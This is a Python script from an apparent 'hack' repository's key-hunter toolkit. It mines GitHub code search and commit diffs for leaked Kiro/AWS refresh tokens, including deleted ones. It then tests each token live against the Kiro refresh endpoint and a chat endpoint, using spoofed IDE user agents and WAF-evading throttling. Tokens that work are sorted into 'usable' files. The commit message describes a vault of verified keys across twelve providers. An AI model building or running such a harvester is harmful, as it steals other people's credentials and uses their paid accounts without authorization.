Files
hack/tools/scripts/llm-key-hunter/hunt_kiro2.py
T
chaos 5d215e1649 Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*,
  pivot miner, two-layer verify/content caches, per-provider verification)
- usable_keys: verified key vault across 12 providers (deepseek, minimax,
  volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.)
- .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow
- NewAPI channel import scripts and CDP capture helpers
- Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
2026-08-02 06:02:58 +08:00

428 lines
18 KiB
Python

#!/usr/bin/env python3
"""Kiro hunter v2 — correct token format + commit-history scan.
Real Kiro tokens are NOT JWTs. They're opaque AWS-blessed strings:
accessToken: aoaAAAAA... (base64, contains '+' '/' and sometimes ':')
refreshToken: aorAAAAA... (~180 chars)
Found in files named kiro-auth-token*.json, ~/.aws/sso/cache/*.json, or in
KIRO_AUTH_TOKEN JSON arrays / KIRO_REFRESH_TOKEN env vars.
Pipeline:
1. GitHub code search for files named kiro-auth-token / .aws/sso/cache kiro, plus
the aoaAAAAA/aorAAAAA token prefixes.
2. Fetch raw content (HEAD) and extract access/refresh tokens.
3. Commit-history scan: for repos that touched kiro-auth-token files, walk
recent commits and grep the patch for aorAAAAA tokens (catches deleted ones).
4. Verify each refresh token via prod.us-east-1.auth.desktop.kiro.dev/refreshToken.
200+accessToken = USABLE (then optional chat probe); 401 = DEAD; else kept.
GitHub and the kiro.dev refresh endpoint are GFW-blocked; all traffic routes via
GH_PROXY (a CN proxy known to reach both).
Outputs results/kiro2/{usable,no_balance,no_access,unknown,dead,all_non_401}.txt
"""
import argparse, base64, json, os, re, subprocess, sys, time, uuid
import urllib.request, urllib.error, urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
HERE = Path(__file__).parent
RESULTS = HERE / "results" / "kiro2"
RESULTS.mkdir(parents=True, exist_ok=True)
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
REFRESH_URL = "https://prod.us-east-1.auth.desktop.kiro.dev/refreshToken"
CHAT_URL = "https://q.us-east-1.amazonaws.com/generateAssistantResponse"
UA = "curl/8.5.0"
# Min seconds between refresh-endpoint posts. Too aggressive and CloudFront WAF
# 403-blocks the whole IP for several minutes.
VERIFY_DELAY = float(os.environ.get("KIRO_VERIFY_DELAY", "0.4"))
# Real token prefixes. Allow base64 alphabet including + and /.
ACCESS_RE = re.compile(r"aoaAAAAA[A-Za-z0-9+/=_:\-]{40,}")
REFRESH_RE = re.compile(r"aorAAAAA[A-Za-z0-9+/=_:\-]{40,}")
QUERIES = [
"filename:kiro-auth-token",
"kiro-auth-token.json",
"kiro-auth-token extension:json",
'"aorAAAAA"',
'"aoaAAAAA"',
'"accessToken" "refreshToken" "kiro" extension:json',
'"refreshToken" "aorAAAAA"',
'"clientIdHash" "refreshToken" extension:json',
'"profileArn" "refreshToken" "kiro"',
'"authMethod" "refreshToken" "kiro" extension:json',
'KIRO_REFRESH_TOKEN=aor',
'KIRO_AUTH_TOKEN aorAAAAA',
'"prod.us-east-1.auth.desktop.kiro.dev" "refreshToken"',
"kiro sso cache extension:json",
'"kiro" "aorAAAAA"',
'"codewhisperer" "refreshToken" extension:json',
]
_opener = None
def opener():
global _opener
if _opener is None:
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}) if GH_PROXY else urllib.request.ProxyHandler({})
_opener = urllib.request.build_opener(h)
return _opener
_direct = None
def direct_opener():
"""Opener that bypasses GH_PROXY. The CN proxy returns CloudFront 403 for the
Kiro refresh/chat endpoints, but they are directly reachable from this host."""
global _direct
if _direct is None:
_direct = urllib.request.build_opener(urllib.request.ProxyHandler({}))
return _direct
def github_token():
t = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
if t: return t
try:
o = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10)
if o.returncode==0: return o.stdout.strip()
except FileNotFoundError: pass
p = Path.home()/".config/gh/hosts.yml"
if p.exists():
for line in p.read_text().splitlines():
if line.strip().startswith("oauth_token:"):
return line.split(":",1)[1].strip()
return None
def gh_get(url, token, timeout=30):
headers = {"Accept":"application/vnd.github+json","User-Agent":"kiro-hunter"}
if token: headers["Authorization"]=f"Bearer {token}"
req = urllib.request.Request(url, headers=headers)
try:
with opener().open(req, timeout=timeout) as r:
return r.getcode(), r.read().decode("utf-8","replace"), dict(r.headers)
except urllib.error.HTTPError as e:
try: body=e.read().decode("utf-8","replace")
except Exception: body=""
return e.code, body, dict(e.headers or {})
except Exception as e:
return 0, f"net:{e}", {}
def search_code(query, token, per_page=100):
for page in range(1,11):
url=("https://api.github.com/search/code"
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
code,body,hdrs = gh_get(url,token)
if code==200:
try: data=json.loads(body)
except Exception: return
items=data.get("items",[])
for it in items: yield it
if len(items)<per_page: return
time.sleep(2.2)
elif code in (403,429):
reset=hdrs.get("X-RateLimit-Reset")
wait=max(int(reset)-int(time.time()),5) if reset else 30
print(f" rate-limited {wait}s",file=sys.stderr,flush=True)
time.sleep(wait+1)
elif code==422:
return
else:
print(f" search {code} for {query!r}",file=sys.stderr); return
def to_raw(u):
return u.replace("github.com","raw.githubusercontent.com").replace("/blob/","/")
def fetch_raw(url, timeout=20):
try:
with opener().open(urllib.request.Request(url,headers={"User-Agent":"Mozilla/5.0"}),timeout=timeout) as r:
return r.read().decode("utf-8","replace")
except Exception:
return ""
def clean(t):
# trim trailing base64 padding-separators / json punctuation that regex may over-grab
return t.rstrip('",;:}]= \t\r\n')
def extract(content):
out = {} # refresh -> {access, source_hint}
for m in REFRESH_RE.findall(content):
rt = clean(m)
# Real Kiro refresh tokens are opaque base64 ~180-260 chars. Reject
# binary/garbage runs that merely start with "aorAAAAA" (these produce
# multi-KB blobs and trigger AWS WAF 403 on the refresh endpoint).
if 120 <= len(rt) <= 400:
out.setdefault(rt, {})
for m in ACCESS_RE.findall(content):
at = clean(m)
if 120 <= len(at) <= 2000:
for rt in out:
out[rt].setdefault("access", at)
return out
def list_file_commits(repo, path, token, max_commits=15):
"""List commits that touched a specific file (bounded). Much cheaper than
walking a whole repo's history."""
q=urllib.parse.quote(path, safe="")
url=f"https://api.github.com/repos/{repo}/commits?path={q}&per_page={max_commits}&page=1"
code,body,hdrs=gh_get(url,token,timeout=15)
if code in (403,429):
reset=hdrs.get("X-RateLimit-Reset")
wait=min(max(int(reset)-int(time.time()),5), 60) if reset else 20
time.sleep(wait+1)
code,body,_=gh_get(url,token,timeout=15)
if code!=200: return
try: data=json.loads(body)
except Exception: return
if not isinstance(data,list): return
for c in data:
sha=c.get("sha")
if sha: yield sha
def commit_patch(repo, sha, token):
"""Return the patch text for a commit (the diff)."""
url=f"https://api.github.com/repos/{repo}/commits/{sha}"
headers={"Accept":"application/vnd.github.v3.diff","User-Agent":"kiro-hunter"}
if token: headers["Authorization"]=f"Bearer {token}"
req=urllib.request.Request(url,headers=headers)
try:
with opener().open(req,timeout=20) as r:
return r.read().decode("utf-8","replace")
except Exception:
return ""
def scan_repo_commits(repo, paths, token, max_commits):
"""Scan commits touching specific files in one repo; return {rt: source}."""
found={}
seen=set()
for path in paths:
try:
shas=list(list_file_commits(repo,path,token,max_commits=max_commits))
except Exception:
continue
for sha in shas:
if sha in seen: continue
seen.add(sha)
patch=commit_patch(repo,sha,token)
if "aorAAAAA" not in patch: continue
for rt in extract(patch):
found[rt]=f"{repo}@{sha[:10]} (commit diff)"
return found
def http_post(url, body, headers, timeout=30):
h={"User-Agent":UA,"Accept":"*/*","Content-Type":"application/json",**headers}
data=json.dumps(body).encode()
req=urllib.request.Request(url,data=data,headers=h,method="POST")
op = direct_opener() if "kiro.dev" in url or "amazonaws.com" in url else opener()
try:
with op.open(req,timeout=timeout) as r:
return r.getcode(), r.read().decode("utf-8","replace")
except urllib.error.HTTPError as e:
try: return e.code, e.read().decode("utf-8","replace")
except Exception: return e.code, ""
except Exception as e:
return 0, f"net:{type(e).__name__}:{e}"
def verify_rt(rt, do_chat=False):
# CloudFront WAF occasionally returns a 403 HTML "Request blocked" when we
# fire too fast. Retry with backoff so a transient block doesn't permanently
# misclassify a token as NO_ACCESS.
import threading as _t
global _verify_lock, _last_post
try:
_verify_lock
except NameError:
_verify_lock=_t.Lock(); _last_post=0.0
code=body=None
for attempt in range(4):
with _verify_lock:
gap=time.time()-_last_post
if gap<VERIFY_DELAY:
time.sleep(VERIFY_DELAY-gap)
_last_post=time.time()
code,body=http_post(REFRESH_URL,{"refreshToken":rt},
{"User-Agent":f"KiroIDE-1.6.0-{uuid.uuid4().hex[:16]}"})
if code==403 and "<!DOCTYPE" in body:
time.sleep(20*(attempt+1)) # back off from WAF
continue
break
access=expires=None
if code==200:
try:
j=json.loads(body)
access=j.get("accessToken") or j.get("access_token")
expires=j.get("expiresIn") or j.get("expires_in")
except Exception: pass
if access and do_chat:
cc,cb=chat_probe(access)
if cc==200: return "USABLE",f"refresh OK; chat 200; exp={expires}",access
if cc in (402,429): return "NO_BALANCE",f"refresh OK; chat {cc}: {cb[:100]}",access
if cc==0: return "NO_ACCESS",f"refresh OK; chat net: {cb[:100]}",access
return "NO_ACCESS",f"refresh OK; chat HTTP {cc}: {cb[:100]}",access
return "USABLE" if access else "NO_ACCESS", f"refresh 200 no accessToken: {body[:100]}", access
if code==401: return "DEAD", f"401 {body[:80]}", None
if code in (402,429): return "NO_BALANCE", f"{code} {body[:100]}", None
if code==0: return "UNKNOWN", body[:120], None
return "NO_ACCESS", f"HTTP {code}: {body[:100]}", None
def chat_probe(access):
cid=str(uuid.uuid4()); aid=str(uuid.uuid4())
body={"conversationState":{
"agentContinuationId":aid,"agentTaskType":"vibe","chatTriggerType":"MANUAL",
"conversationId":cid,
"currentMessage":{"userInputMessage":{"content":"hi","modelId":"claude-haiku-4.5","origin":"AI_EDITOR"}},
"history":[]}}
headers={"x-amzn-codewhisperer-optout":"true","x-amzn-kiro-agent-mode":"vibe",
"Authorization":f"Bearer {access}","Host":"q.us-east-1.amazonaws.com",
"amz-sdk-invocation-id":str(uuid.uuid4()),"amz-sdk-request":"attempt=1; max=1",
"User-Agent":f"aws-sdk-js/1.0.27 KiroIDE-1.6.0-{uuid.uuid4().hex[:16]}"}
return http_post(CHAT_URL,body,headers,timeout=40)
def main():
ap=argparse.ArgumentParser()
ap.add_argument("--verify-only",action="store_true")
ap.add_argument("--workers",type=int,default=15)
ap.add_argument("--scan-commits",action="store_true",
help="Walk commit history of touched repos to find deleted tokens")
ap.add_argument("--commit-pages",type=int,default=2)
ap.add_argument("--commit-workers",type=int,default=12,
help="Parallel repos for the commit-history scan")
ap.add_argument("--chat",action="store_true",help="Do a live chat probe on usable tokens")
args=ap.parse_args()
token=github_token()
print(f"proxy={GH_PROXY} token={'yes' if token else 'no'} scan_commits={args.scan_commits}",flush=True)
rts={} # refresh -> source
if args.verify_only:
ef=RESULTS/"refresh_tokens.txt"
if ef.exists():
for line in ef.read_text().splitlines():
if "|" in line:
rt,src=line.split("|",1)
rts[rt]=src
print(f"verify-only: {len(rts)} tokens",flush=True)
else:
print("\n=== Stage 1: code search ===",flush=True)
files={}
for i,q in enumerate(QUERIES,1):
print(f" [{i:2d}/{len(QUERIES)}] {q}",flush=True)
try:
for it in search_code(q,token):
u=it.get("html_url","")
if u: files[u]=it.get("repository",{}).get("full_name","?")
except Exception as e:
print(" err",e,file=sys.stderr)
print(f" candidate files: {len(files)}",flush=True)
# extract from HEAD raw
print("\n=== Stage 2a: HEAD raw extraction ===",flush=True)
done=0
repo_paths={} # repo -> set(paths)
with ThreadPoolExecutor(max_workers=20) as pool:
futs={pool.submit(fetch_raw,to_raw(u)):(u,repo) for u,repo in files.items()}
for f in as_completed(futs):
u,repo=futs[f]; done+=1
# derive file path from html url: https://github.com/{repo}/blob/{branch}/{path}
try:
parts=u.split("/blob/",1)
if len(parts)==2:
path=parts[1].split("/",1)[1] # drop ref
repo_paths.setdefault(repo,set()).add(path)
except Exception:
pass
try: content=f.result()
except Exception: content=""
for rt in extract(content):
rts.setdefault(rt,u)
if done%200==0:
print(f" {done}/{len(files)} tokens={len(rts)}",flush=True)
nfiles=sum(len(v) for v in repo_paths.values())
print(f" after HEAD: {len(rts)} refresh tokens; {len(repo_paths)} repos, {nfiles} tracked files",flush=True)
# durable checkpoint of HEAD tokens before the slow commit scan
with open(RESULTS/"refresh_tokens.txt","w") as f:
for rt,src in sorted(rts.items()):
f.write(f"{rt}|{src}\n")
if args.scan_commits:
print(f"\n=== Stage 2b: per-file commit-history scan (max {args.commit_pages} commits/file, {args.commit_workers} workers) ===",flush=True)
repo_list=sorted(repo_paths)
scanned=0; lock=__import__("threading").Lock()
def _job(repo):
return repo, scan_repo_commits(repo,repo_paths[repo],token,args.commit_pages)
with ThreadPoolExecutor(max_workers=args.commit_workers) as pool:
futs={pool.submit(_job,repo):repo for repo in repo_list}
for f in as_completed(futs):
repo=futs[f]; scanned+=1
try:
_,found=f.result()
except Exception:
found={}
new=0
if found:
with lock:
before=len(rts)
for rt,src in found.items():
rts.setdefault(rt,src)
new=len(rts)-before
if new:
print(f" [{scanned}/{len(repo_list)}] {repo}: +{new} (total {len(rts)})",flush=True)
if scanned%25==0:
print(f" scanned {scanned}/{len(repo_list)} repos, tokens={len(rts)}",flush=True)
with open(RESULTS/"refresh_tokens.txt","w") as f:
for rt,src in sorted(rts.items()):
f.write(f"{rt}|{src}\n")
with open(RESULTS/"refresh_tokens.txt","w") as f:
for rt,src in sorted(rts.items()):
f.write(f"{rt}|{src}\n")
print(f" saved {len(rts)} tokens -> refresh_tokens.txt",flush=True)
print(f"\n=== Stage 3: verify {len(rts)} refresh tokens (workers={args.workers}) ===",flush=True)
buckets={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]}
start=time.time(); done=0
with ThreadPoolExecutor(max_workers=args.workers) as pool:
futs={pool.submit(verify_rt,rt,args.chat):(rt,src) for rt,src in rts.items()}
for f in as_completed(futs):
rt,src=futs[f]; done+=1
try: v,detail,access=f.result()
except Exception as e: v,detail,access="UNKNOWN",f"exc:{e}",None
buckets[v].append((rt,src,access,detail))
if done%10==0:
el=time.time()-start
print(f" [{done:4d}/{len(rts)}] "+" ".join(f"{k.lower()}={len(buckets[k])}" for k in buckets)+f" ({done/el:.1f}/s)",flush=True)
for name,items in buckets.items():
with open(RESULTS/f"{name.lower()}.txt","w") as f:
for rt,src,access,detail in items:
f.write(f"{rt}|{src}|access={access or ''}|{detail}\n")
print(f" {name:11s}: {len(items):4d}",flush=True)
with open(RESULTS/"all_non_401.txt","w") as f:
for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN"):
for rt,src,access,detail in buckets[name]:
f.write(f"{name}|{rt}|{src}|access={access or ''}|{detail}\n")
if buckets["USABLE"]:
print("\n=== USABLE KIRO TOKENS ===",flush=True)
for rt,src,access,detail in buckets["USABLE"]:
print(f" refresh: {rt[:45]}...{rt[-8:]}\n src: {src}\n {detail}\n",flush=True)
if __name__=="__main__":
main()